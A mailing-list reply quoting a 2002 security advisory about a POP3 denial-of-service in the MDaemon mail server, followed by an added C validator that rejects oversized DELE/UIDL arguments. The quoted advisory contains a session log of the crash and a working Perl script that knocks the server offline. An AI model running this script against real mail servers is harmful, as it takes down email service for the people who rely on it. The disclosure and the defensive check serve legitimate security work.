5.0.7 not vulnerable (tested on registered pro server). Tested DELE and UIDL
both with over 40b of 1.
-Karl Pietri
----- Original Message -----
From: "D4rkGr3y" <grey_1999 (at) mail (dot) ru [email concealed]>
To: <bugtraq (at) securityfocus (dot) com [email concealed]>; <submissions (at) packetstormsecurity (dot) com [email concealed]>;
<vulnwatch (at) vulnwatch (dot) org [email concealed]>
Sent: Sunday, October 27, 2002 11:49 AM
Subject: MDaemon SMTP/POP/IMAP server DoS
> ######################################################
> #Product: MDaemon SMTP/POP/IMAP server #
> #Authors: Alt-N Technologies Ltd [www.mdaemon.com] #
> #Vulnerable versions: v.6.0.7 and below #
> #Vulnerability: buffer overflow #
> #Bug&exploit by D4rkGr3y [www.dhgroup.org] #
> ######################################################
>
> #Overview#--------------------------------------------------------------#
> From MDaemon's help file:
> "MDaemon Server v6 brings SMTP/POP/IMAP and MIME mail services
> commonplace on UNIX hosts and the Internet to Windows based servers
> and microcomputers. MDaemon is designed to manage the email needs of
> any number of individual users and comes complete with a powerful set
> of integrated tools for managing mail accounts and message formats.
> MDaemon offers a scalable SMTP, POP3, and IMAP4 mail server complete
> with LDAP support, an integrated browser-based email client, content
> filtering, spam blockers, extensive security features, and more."
>
> #Problem#----------------------------------------------------------------#
> Bug found in MDaemon's pop-server. It's possible to kill MDaemon by
> sending long arguments (32b and above) with DELE or UIDL commands.
> To do this u must have at least mail-account on vulnerable host.
> After getting long request from client, all MDaemon's Services will be
> closed (smtp, imap, pop, (?)worldclient).
> Here is the log of attack on local MDaemon POP-server:
>
> +OK dark.ru POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7 <MDAEMON-F200210271036.AA3656130MD0012 (at) dark (dot) ru [email concealed]>
> USER D4rkGr3y
> +OK D4rkGr3y... Recipient ok
> PASS cool-pass
> +OK D4rkGr3y (at) dark (dot) ru [email concealed]'s mailbox has 1 total messages (18356 octets).
> UIDL 11111111111111111111111111111111
>
> Connection to host lost...
>
> #Exploit#----------------------------------------------------------------#
>
> #!/usr/bin/perl
> #MDaemon SMTP/POP/IMAP server remote DoS exploit by D4rkGr3y
> use IO::Socket;
> $host = "[vuln_host]";
> $login = "[login]";
> $pass = "[pass]";
> $port = "110";
> $data = "1";
> $num = "32";
> $buf .= $data x $num;
> $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port,
> Proto => "tcp", Type => SOCK_STREAM)
> or die "Couldn't connect: @!\n";
> print $socket "USER $login\n";
> print $socket "PASS $user\n";
> print $socket "UIDL $buf\n";
> close($socket);
>
> #EOF
>
> Best regards www.dhgroup.org
> D4rkGr3y icq 540981
>
>
>
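Added example, not part of the original posts and not MDaemon's code: a bounded validator for the DELE/UIDL argument, showing the server-side check that rejects the request in the quoted session log before any conversion or copy takes place. The function names, return codes and the 9-digit limit are assumptions chosen for illustration.

```c
/* Added example; names and limits are illustrative, not MDaemon's code. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAX_MSG_DIGITS 9 /* assumption: keeps the value below 10^9, inside a long */

enum pop3_rc { POP3_OK, POP3_OK_ALL, POP3_BAD_CMD, POP3_BAD_ARG,
               POP3_ARG_TOO_LONG, POP3_NO_SUCH_MSG };

/* Case-insensitive keyword match; stops at the first mismatch or NUL. */
static int keyword_is(const char *line, const char *kw)
{
    size_t i;
    for (i = 0; kw[i]; i++)
        if (toupper((unsigned char)line[i]) != kw[i]) return 0;
    return line[i] == '\0' || line[i] == ' ';
}

/* Validate "DELE n" or "UIDL [n]" (CRLF already stripped). The argument is
 * checked in place, so no client-sized data is copied into a fixed buffer. */
enum pop3_rc pop3_parse_msg_cmd(const char *line, long msg_count, long *msg)
{
    int is_uidl = keyword_is(line, "UIDL");
    const char *arg;
    size_t i, n;
    long v = 0;

    if (!is_uidl && !keyword_is(line, "DELE")) return POP3_BAD_CMD;
    for (arg = line + 4; *arg == ' '; arg++) ;
    if (*arg == '\0') return is_uidl ? POP3_OK_ALL : POP3_BAD_ARG;
    n = strlen(arg);
    if (n > MAX_MSG_DIGITS) return POP3_ARG_TOO_LONG; /* length check first */
    for (i = 0; i < n; i++) {
        if (!isdigit((unsigned char)arg[i])) return POP3_BAD_ARG;
        v = v * 10 + (arg[i] - '0');
    }
    if (v < 1 || v > msg_count) return POP3_NO_SUCH_MSG;
    *msg = v;
    return POP3_OK;
}

int main(void)
{
    long m = 0;
    /* The UIDL request from the session log, against a one-message maildrop. */
    enum pop3_rc rc = pop3_parse_msg_cmd("UIDL 11111111111111111111111111111111", 1, &m);
    printf("oversized UIDL -> %d\n", rc);
    rc = pop3_parse_msg_cmd("DELE 1", 1, &m);
    printf("DELE 1 -> %d, msg %ld\n", rc, m);
    return 0;
}
```

A server would answer every non-OK code with `-ERR` and keep the session open; the same length and digit checks can be applied to captured POP3 traffic to flag oversized DELE/UIDL arguments.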